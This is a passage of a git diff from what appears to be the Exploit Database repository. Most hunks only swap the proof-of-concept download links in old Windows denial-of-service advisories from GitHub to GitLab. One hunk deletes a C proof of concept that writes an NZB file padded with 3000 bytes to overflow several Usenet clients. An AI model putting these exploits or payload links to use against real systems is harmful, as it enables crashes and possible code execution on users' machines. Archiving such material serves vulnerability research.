+https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27069.jpg \ No newline at end of file diff --git a/exploits/windows/dos/27090.c b/exploits/windows/dos/27090.c index 401911c17..d175fc7dc 100644 --- a/exploits/windows/dos/27090.c +++ b/exploits/windows/dos/27090.c @@ -99,4 +99,4 @@ int main(int argc, char **argv) WSACleanup(); return 1; -} +} \ No newline at end of file diff --git a/exploits/windows/dos/27476.txt b/exploits/windows/dos/27476.txt index 79eac449a..263dab329 100644 --- a/exploits/windows/dos/27476.txt +++ b/exploits/windows/dos/27476.txt @@ -4,4 +4,4 @@ Microsoft .NET Framework SDK contains tools for assembling and disassembling MSI These issues were reported to affect the .NET Framework SDK version 1.1 SP1; earlier versions may also be affected. Version 2.0 may also be affected, but code execution does not seem possible. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27476.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27476.zip \ No newline at end of file diff --git a/exploits/windows/dos/27745.txt b/exploits/windows/dos/27745.txt index 748599c96..f2b3bcc85 100644 --- a/exploits/windows/dos/27745.txt +++ b/exploits/windows/dos/27745.txt @@ -6,4 +6,4 @@ This vulnerability may let a malicious website access properties of a site in an This issue was previously reported as an Internet Explorer vulnerability, but the affected component is found to be part of Outlook Express and Windows Mail. Microsoft confirmed that this is an Outlook Express/Windows Mail vulnerability that can also be exploited through Internet Explorer. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27745.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27745.zip \ No newline at end of file diff --git a/exploits/windows/dos/27850.txt b/exploits/windows/dos/27850.txt index 908b98a69..dd102035b 100644 --- a/exploits/windows/dos/27850.txt +++ b/exploits/windows/dos/27850.txt @@ -6,4 +6,4 @@ This vulnerability allows remote attackers to execute arbitrary machine code in Attackers may exploit this issue by coercing users to open malicious CHM or ITS files with Internet Explorer, or when users try to decompile such files using the 'hh -decompile' command. CHM files are considered unsafe files, so there is a possibility that advanced users or security researchers may try to decompile these files to inspect their contents. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27850.chm \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27850.chm \ No newline at end of file diff --git a/exploits/windows/dos/27971.txt b/exploits/windows/dos/27971.txt index d33fd158b..d8e1bfe6a 100644 --- a/exploits/windows/dos/27971.txt +++ b/exploits/windows/dos/27971.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue by enticing a user to visit a malicious site The vendor reports this issue may also be exploited to execute arbitrary code in the context of the victim user. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27971.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27971.zip \ No newline at end of file diff --git a/exploits/windows/dos/28050.txt b/exploits/windows/dos/28050.txt index 2c8621d7f..80375951f 100644 --- a/exploits/windows/dos/28050.txt +++ b/exploits/windows/dos/28050.txt @@ -9,7 +9,7 @@ http://www.oracle.com/technetwork/java/javase/downloads/index.html # Tested on: Windows 7 # CVE : CVE-2013-2470 -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28050.zip +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28050.zip CVE-2013-2470 - Java_sun_awt_image_ImagingLib_lookupByteBI heap buffer diff --git a/exploits/windows/dos/28087.txt b/exploits/windows/dos/28087.txt index 36b11f679..ea6166015 100644 --- a/exploits/windows/dos/28087.txt +++ b/exploits/windows/dos/28087.txt @@ -6,4 +6,4 @@ A successful attack may allow attackers to access sensitive information and pote The researcher responsible for discovering this issue has indicated that it presents itself on Windows 2003 SP1, Windows XP Professional Edition SP1 and SP2 running Microsoft Office 2003, and Windows 2000 Professional running Microsoft Office 2003. Other versions may be vulnerable as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28087.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28087.zip \ No newline at end of file diff --git a/exploits/windows/dos/28222.txt b/exploits/windows/dos/28222.txt index 443de11bc..60388c87f 100644 --- a/exploits/windows/dos/28222.txt +++ b/exploits/windows/dos/28222.txt @@ -8,4 +8,4 @@ These vulnerabilities allow remote attackers to execute arbitrary machine code i Microsoft Works version 8.0 is vulnerable to these issues; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28222.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28222.zip \ No newline at end of file diff --git a/exploits/windows/dos/28227.txt b/exploits/windows/dos/28227.txt index 1ff2a4897..05c62251a 100644 --- a/exploits/windows/dos/28227.txt +++ b/exploits/windows/dos/28227.txt @@ -6,4 +6,4 @@ This issue occurs when a program calls certain API calls for manipulating Window NOTE: This BID has been revised (July 3, 2007); the issue was originally thought to be a vulnerability in Symantec Norton Personal Firewall, but further investigation reveals a problem in an underlying OS API. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28227.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28227.zip \ No newline at end of file diff --git a/exploits/windows/dos/28343.txt b/exploits/windows/dos/28343.txt index fb2c71035..03c79af65 100644 --- a/exploits/windows/dos/28343.txt +++ b/exploits/windows/dos/28343.txt @@ -4,4 +4,4 @@ Microsoft Internet Explorer is prone to a denial-of-service vulnerability when h Successfully exploiting this issue allows attackers to consume excessive CPU resources in the affected browser and eventually cause Internet Explorer to crash, causing a denial-of-service. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28343.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28343.zip \ No newline at end of file diff --git a/exploits/windows/dos/28381.txt b/exploits/windows/dos/28381.txt index 6bf214af8..55d6e3a3f 100644 --- a/exploits/windows/dos/28381.txt +++ b/exploits/windows/dos/28381.txt @@ -10,4 +10,4 @@ Specific information regarding affected versions of Microsoft Windows is current Update: Since help files can inherently execute arbitrary malicious code, this BID is being retired. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28381.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28381.zip \ No newline at end of file diff --git a/exploits/windows/dos/28469.txt b/exploits/windows/dos/28469.txt index 9296cabba..ef7d6d73d 100644 --- a/exploits/windows/dos/28469.txt +++ b/exploits/windows/dos/28469.txt @@ -6,4 +6,4 @@ This vulnerability allows local attackers to crash affected systems, facilitatin Versions 3.6.cpn, 3.6.cpj, and 3.6.cpiE are vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28469.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28469.zip \ No newline at end of file diff --git a/exploits/windows/dos/28588.txt b/exploits/windows/dos/28588.txt index 8e64a9eba..59c685a9d 100644 --- a/exploits/windows/dos/28588.txt +++ b/exploits/windows/dos/28588.txt @@ -6,4 +6,4 @@ A local authenticated attacker may exploit this issue to crash affected computer Please see the vulnerable systems section for details regarding affected Symantec products. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28588.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28588.zip \ No newline at end of file diff --git a/exploits/windows/dos/28880.txt b/exploits/windows/dos/28880.txt index 0f72fb324..ee42dbbb0 100644 --- a/exploits/windows/dos/28880.txt +++ b/exploits/windows/dos/28880.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue will cause the affected application to crash, Internet Explorer 6 and 7 are vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28880.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28880.zip \ No newline at end of file diff --git a/exploits/windows/dos/28894.txt b/exploits/windows/dos/28894.txt index 8b0a94f6f..861741b52 100644 --- a/exploits/windows/dos/28894.txt +++ b/exploits/windows/dos/28894.txt @@ -6,4 +6,4 @@ Exploiting this issue allows local attackers to crash affected computers, denyin Outpost Firewall PRO 4.0 (964.582.059) is vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28894.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28894.zip \ No newline at end of file diff --git a/exploits/windows/dos/29148.txt b/exploits/windows/dos/29148.txt index 65ebc8fb2..de463e479 100644 --- a/exploits/windows/dos/29148.txt +++ b/exploits/windows/dos/29148.txt @@ -15,4 +15,4 @@ Could not get code execution unfortunately... -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29148.asf \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29148.asf \ No newline at end of file diff --git a/exploits/windows/dos/29172.txt b/exploits/windows/dos/29172.txt index 4821d0192..d02d1d1ef 100644 --- a/exploits/windows/dos/29172.txt +++ b/exploits/windows/dos/29172.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to crash the affected application, denying se This issue affects Microsoft Office 97 for Windows; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29172.asx \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29172.asx \ No newline at end of file diff --git a/exploits/windows/dos/2922.txt b/exploits/windows/dos/2922.txt index ae42ca585..5dc880b61 100644 --- a/exploits/windows/dos/2922.txt +++ b/exploits/windows/dos/2922.txt @@ -27,6 +27,6 @@ bug hugs, disco. -poc: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/2922.doc (12122006-djtest.doc) +poc: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/2922.doc (12122006-djtest.doc) # milw0rm.com [2006-12-12] \ No newline at end of file diff --git a/exploits/windows/dos/29285.txt b/exploits/windows/dos/29285.txt index d17be6cbb..ec5e54e4a 100644 --- a/exploits/windows/dos/29285.txt +++ b/exploits/windows/dos/29285.txt @@ -6,4 +6,4 @@ A remote attacker may exploit this vulnerability by presenting malicious 'WMV', It is not known at this time if this issue can be leveraged to execute arbitrary code; this BID will be updated as further information becomes available. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29285.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29285.zip \ No newline at end of file diff --git a/exploits/windows/dos/29286.txt b/exploits/windows/dos/29286.txt index ccca644ff..c882a5b44 100644 --- a/exploits/windows/dos/29286.txt +++ b/exploits/windows/dos/29286.txt @@ -6,4 +6,4 @@ A remote attacker may exploit this vulnerability by presenting malicious 'WMV', It is not known at this time if this issue can be leveraged to execute arbitrary code; this BID will be updated as further information becomes available. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29286.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29286.zip \ No newline at end of file diff --git a/exploits/windows/dos/29287.txt b/exploits/windows/dos/29287.txt index a39b2ef11..9780287a5 100644 --- a/exploits/windows/dos/29287.txt +++ b/exploits/windows/dos/29287.txt @@ -13,4 +13,4 @@ Filseclab Personal Firewall version 3.0.0.8686 Look 'n' Stop Personal Firewall version 2.05p2 Symantec Sygate Personal Firewall version 5.6.2808 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29287.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29287.zip \ No newline at end of file diff --git a/exploits/windows/dos/29618.c b/exploits/windows/dos/29618.c deleted file mode 100644 index 43e30d1b4..000000000 --- a/exploits/windows/dos/29618.c +++ /dev/null @@ -1,150 +0,0 @@ -// source: https://www.securityfocus.com/bid/22617/info - -News File Grabber is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. - -Exploiting this issue allows attackers to execute arbitrary machine code in the context of the affected application. - -This issue affects version 4.1.0.1; other versions may also be affected. - -/*********************************************************************************************\ -* - * -* NZB Generic 0Day DoS Exploit - * -* Proofs of Concept for News File Grabber, NewsBin, Grabit, NewsReactor -and News Rover * -* - * -* - * -* Bugs in News Rover <=12.1 Rev 1: - * -* There's a stack overflow in RoverNZB triggered by files that contains a -long subject. * -* There's a stack overflow in NewsRover triggered by files that contains a -long group. * -* To trigger: run file.nzb - * -* Impact: Code execution on Windows XP, SP1 and SP2 - * -* - * -* Bug in News File Grabber 4.1.0.1: - * -* If the subject field contains a new line, the app will try to exec data in -memory. But * -* since the address changed every time the app runs it's very hard to -exploit. However I * -* sometimes got EIP overwritten by my chars - * -* To trigger: load file.nzb and start download. CPU -> 100% and then Out of -Memory error. * -* Impact: Code execution on Windows XP, SP1 and SP2 - * -* - * -* Bug in Grabit 1.5.3: - * -* Grabit does not correctly handle fields that contains a semicolon. - * -* To trigger: Just grab the file - * -* Impact: DoS - * -* Note: Grabit 1.6 is not affected. - * -* - * -* Bug in NewsReactor: - * -* There's a heap overflow that occurs when group field is too long. - * -* To trigger: load file.nzb, click grab. After a few tries to get the file -it crashes. * -* Impact: Code execution on Windows XP, SP1 and DoS on SP2 - * -* - * -* Bug in NewsBin Pro 4.3.2: - * -* There's a heap overflow that occurs when group field is too long. - * -* To trigger: load file.nzb, and start download. The app should then be -unstable. * -* Impact: Code execution on Windows XP, SP1 and DoS on SP2 - * -* - * -* Bug in NewsBin Pro 5.33 (maybe others...): - * -* There's a heap overflow that occurs when group field is too long. - * -* To trigger: load file.nzb, and start download. Then click "Delete All -Posts". Boom! * -* Impact: Code execution on Windows XP, SP1 and DoS on SP2 - * -* Note: Maybe it's possible to exec code on SP2, but there is a lot of bad -chars and with the * -* stack protection I didn't find a way to jump to a good return address. - * -* - * -* Solution: Buy your dvds leecha!!! - * -* - * -* - * -* Coded and discovered by Marsu - * -* Note: thx aux Bananas et a la KryptonIT. Bon courage aux inuITs :P - * -\*********************************************************************************************/ - -#include "stdlib.h" -#include "stdio.h" -#include "string.h" - -char nzbheader[]="\n" - "\n" - "\n" - "\n\n"; - - -char nzbend[]="\n" - "\n" - "\n" - "\n"; - - - -int main(int argc, char* argv[]) { - -FILE *file; -char * pad; - -printf("MarsupilamiPowa's Generic NZB DoS Exploit\n"); - -file=fopen("file.nzb","wb"); - -fprintf(file,nzbheader); -fprintf(file,"\n"); -fprintf(file,""); - -pad = (char*)malloc(sizeof(char)*3000); -memset(pad,'A',3000); -fprintf(file,pad); -fprintf(file,"\n\n"); -fprintf(file,"\n;\n"); -fprintf(file,nzbend); -fclose(file); - -printf("file.nzb generated! Have fun\n"); -return 0; - -} - diff --git a/exploits/windows/dos/29660.txt b/exploits/windows/dos/29660.txt index f19373ccb..198db1247 100644 --- a/exploits/windows/dos/29660.txt +++ b/exploits/windows/dos/29660.txt @@ -8,4 +8,4 @@ Microsoft Office 2003 is vulnerable to this issue; other versions may also be af Note: IrfanView version 3.99 is also vulnerable to this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29660.wmf \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29660.wmf \ No newline at end of file diff --git a/exploits/windows/dos/29664.txt b/exploits/windows/dos/29664.txt index bf176b94d..f3875c52a 100644 --- a/exploits/windows/dos/29664.txt +++ b/exploits/windows/dos/29664.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to crash the affected Microsoft Office Publisher 2007 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29664.pub \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29664.pub \ No newline at end of file diff --git a/exploits/windows/dos/29707.txt b/exploits/windows/dos/29707.txt index 7751cb161..cd6b37ebc 100644 --- a/exploits/windows/dos/29707.txt +++ b/exploits/windows/dos/29707.txt @@ -13,4 +13,4 @@ image(width or height smaller than 65535 ) which could lead to code exec. The file that causes the AV is attached: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29707.gif \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29707.gif \ No newline at end of file diff --git a/exploits/windows/dos/29738.txt b/exploits/windows/dos/29738.txt index f06f09902..48c4ee9fd 100644 --- a/exploits/windows/dos/29738.txt +++ b/exploits/windows/dos/29738.txt @@ -6,4 +6,4 @@ A remote attacker may exploit this vulnerability by presenting a malicious WAV f Successful exploits will result in excessive CPU consumption, effectively denying service. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29738.wav \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29738.wav \ No newline at end of file diff --git a/exploits/windows/dos/29743.txt b/exploits/windows/dos/29743.txt index dc0b0e22b..ba3cc4098 100644 --- a/exploits/windows/dos/29743.txt +++ b/exploits/windows/dos/29743.txt @@ -6,4 +6,4 @@ A local authenticated attacker may exploit this issue to crash affected computer This issue is similar to the one described in BID 22961. Symantec is currently investigating this issue; we will update this BID as more information emerges. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29743.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29743.zip \ No newline at end of file diff --git a/exploits/windows/dos/30160.txt b/exploits/windows/dos/30160.txt index 2c6c48d9a..21d904188 100644 --- a/exploits/windows/dos/30160.txt +++ b/exploits/windows/dos/30160.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue by enticing victims into opening a malicious Successful exploits will result in denial-of-service conditions on applications using the affected library. Applications such as Windows Explorer or Picture and Fax viewer have been identified as vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30160.ico.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30160.ico.zip \ No newline at end of file diff --git a/exploits/windows/dos/30208.txt b/exploits/windows/dos/30208.txt index 151345e1b..1959a2553 100644 --- a/exploits/windows/dos/30208.txt +++ b/exploits/windows/dos/30208.txt @@ -3,7 +3,7 @@ http://corelabs.coresecurity.com/ IcoFX Buffer Overflow Vulnerability -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30208.zip +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30208.zip 1. *Advisory Information* diff --git a/exploits/windows/dos/30255.txt b/exploits/windows/dos/30255.txt index 275663329..fe6b76b19 100644 --- a/exploits/windows/dos/30255.txt +++ b/exploits/windows/dos/30255.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to execute arbitrary code with the privileges PC SOFT WinDEV 11 is reported vulnerable; other versions and related products (WinDEV Express, Mobile, and WebDEV) may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30255.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30255.zip \ No newline at end of file diff --git a/exploits/windows/dos/30462.py b/exploits/windows/dos/30462.py index 9f3accd00..338f5c7e7 100755 --- a/exploits/windows/dos/30462.py +++ b/exploits/windows/dos/30462.py @@ -68,5 +68,5 @@ print "[x] File successfully written." f.close() print "[x] Open iapetus.au with Windows Media Player 11." -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30462-1.au -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30462-2.py \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30462-1.au +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30462-2.py \ No newline at end of file diff --git a/exploits/windows/dos/30500.txt b/exploits/windows/dos/30500.txt index 4c9f0f382..60855db95 100644 --- a/exploits/windows/dos/30500.txt +++ b/exploits/windows/dos/30500.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to crash the affected application, denying se This issue affects Yahoo! Messenger 8.1.0; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30500.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30500.rar \ No newline at end of file diff --git a/exploits/windows/dos/30512.txt b/exploits/windows/dos/30512.txt index efbc6758a..8e1c9c89a 100644 --- a/exploits/windows/dos/30512.txt +++ b/exploits/windows/dos/30512.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues allows remote attackers to crash the affect FileInfo 2.09 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30512.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30512.exe \ No newline at end of file diff --git a/exploits/windows/dos/30544.txt b/exploits/windows/dos/30544.txt index ebc73c693..aa9ea97fc 100644 --- a/exploits/windows/dos/30544.txt +++ b/exploits/windows/dos/30544.txt @@ -8,4 +8,4 @@ NOTE: This issue is reportedly caused by a buffer-overflow issue, but this has n Yahoo! Messenger 8.1.0.209 and 8.1.0.402 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30544.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30544.rar \ No newline at end of file diff --git a/exploits/windows/dos/30590.txt b/exploits/windows/dos/30590.txt index 898d1d053..915ff815d 100644 --- a/exploits/windows/dos/30590.txt +++ b/exploits/windows/dos/30590.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to cause a denial of service or to write mali WinImage 8.0 and 8.10 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30590.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30590.zip \ No newline at end of file diff --git a/exploits/windows/dos/30619.txt b/exploits/windows/dos/30619.txt index 6fc322096..d4fb659a6 100644 --- a/exploits/windows/dos/30619.txt +++ b/exploits/windows/dos/30619.txt @@ -4,4 +4,4 @@ Microsoft Windows Explorer is prone to a denial-of-service vulnerability because Attackers can exploit this issue to cause Windows Explorer to exhaust CPU cycles and become unresponsive. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30619.png \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30619.png \ No newline at end of file diff --git a/exploits/windows/dos/30672.txt b/exploits/windows/dos/30672.txt index 9cbc62de4..29b2d330d 100644 --- a/exploits/windows/dos/30672.txt +++ b/exploits/windows/dos/30672.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary code with the privileges UPDATE (December 24, 2007): The recently released Y patch does not address this issue. Please see the references for more information. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30672.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30672.zip \ No newline at end of file diff --git a/exploits/windows/dos/30934.txt b/exploits/windows/dos/30934.txt index c2a3b728e..71e9b8a04 100644 --- a/exploits/windows/dos/30934.txt +++ b/exploits/windows/dos/30934.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to crash the application. Given the nature of This issue is reported to affect Total Player 3.0; other versions may also be vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30934.m3u \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30934.m3u \ No newline at end of file diff --git a/exploits/windows/dos/31122.txt b/exploits/windows/dos/31122.txt index 6b6169634..e4784929f 100644 --- a/exploits/windows/dos/31122.txt +++ b/exploits/windows/dos/31122.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to execute arbitrary code, cause denial-of-se These issues affect Ipswitch Instant Messaging 2.0.8.1; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31122.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31122.zip \ No newline at end of file diff --git a/exploits/windows/dos/312.txt b/exploits/windows/dos/312.txt index e581399a7..88cbaa74d 100644 --- a/exploits/windows/dos/312.txt +++ b/exploits/windows/dos/312.txt @@ -20,7 +20,7 @@ Then, in this situation the only alternate is to kill the process. --- [Proof of Concept] --- Please download this file. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/312.zip (av_bomb_3.zip) <--- For symantec. +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/312.zip (av_bomb_3.zip) <--- For symantec. The file contains, 'EICAR Test String' burried in 49647 directories. This is just a RAW 'proof of concept'. A few 100kb's of compressed file could be crafted in a way... NAV will take hours or MIGHT even days to complete the scan causing 100% cup use in email gateways for hours. The compressed archive must not necessarily be a '.zip' to trigger this attack. diff --git a/exploits/windows/dos/31300.txt b/exploits/windows/dos/31300.txt index 18911352a..282023aef 100644 --- a/exploits/windows/dos/31300.txt +++ b/exploits/windows/dos/31300.txt @@ -9,4 +9,4 @@ This issue affects the following: SurgeMail 38k4, beta 39a and earlier Netwin WebMail 3.1s and earlier -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31300.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31300.zip \ No newline at end of file diff --git a/exploits/windows/dos/31301.txt b/exploits/windows/dos/31301.txt index 0768961ab..05ecdab87 100644 --- a/exploits/windows/dos/31301.txt +++ b/exploits/windows/dos/31301.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to execute arbitrary SurgeMail 38k4 and prior versions are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31301.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31301.zip \ No newline at end of file diff --git a/exploits/windows/dos/31310.txt b/exploits/windows/dos/31310.txt index fae60cc9a..be6fe5fca 100644 --- a/exploits/windows/dos/31310.txt +++ b/exploits/windows/dos/31310.txt @@ -11,4 +11,4 @@ OfficeScan Corporate Edition 7.0 Patch 3 Build 1314 and earlier Other Trend Micro products may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31310.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31310.zip \ No newline at end of file diff --git a/exploits/windows/dos/31330.txt b/exploits/windows/dos/31330.txt index 75e3b42c9..b9552f6c8 100644 --- a/exploits/windows/dos/31330.txt +++ b/exploits/windows/dos/31330.txt @@ -6,4 +6,4 @@ A successful exploit will allow remote attackers to execute arbitrary code in th These issues affect Borland VisiBroker Smart Agent 08.00.00.C1.03; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31330.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31330.zip \ No newline at end of file diff --git a/exploits/windows/dos/31338.txt b/exploits/windows/dos/31338.txt index 559248cb6..5193fb130 100644 --- a/exploits/windows/dos/31338.txt +++ b/exploits/windows/dos/31338.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to crash the affected application or cause These issues affect Perforce Server 2007.3; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31338.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31338.zip \ No newline at end of file diff --git a/exploits/windows/dos/31360.txt b/exploits/windows/dos/31360.txt index 82a2f022b..fb61eabbf 100644 --- a/exploits/windows/dos/31360.txt +++ b/exploits/windows/dos/31360.txt @@ -9,5 +9,5 @@ An attacker may leverage these issues to execute arbitrary code in the context o These issues affect MailEnable 3.13; other versions may also be vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31360-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31360-2.pl \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31360-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31360-2.pl \ No newline at end of file diff --git a/exploits/windows/dos/31361.txt b/exploits/windows/dos/31361.txt index fffdbbb40..1dc35cbe9 100644 --- a/exploits/windows/dos/31361.txt +++ b/exploits/windows/dos/31361.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue by enticing a victim to open a malicious Of Successfully exploiting this issue would allow the attacker to execute arbitrary code in the context of the currently logged-in user. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31361.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31361.tgz \ No newline at end of file diff --git a/exploits/windows/dos/31363.txt b/exploits/windows/dos/31363.txt index 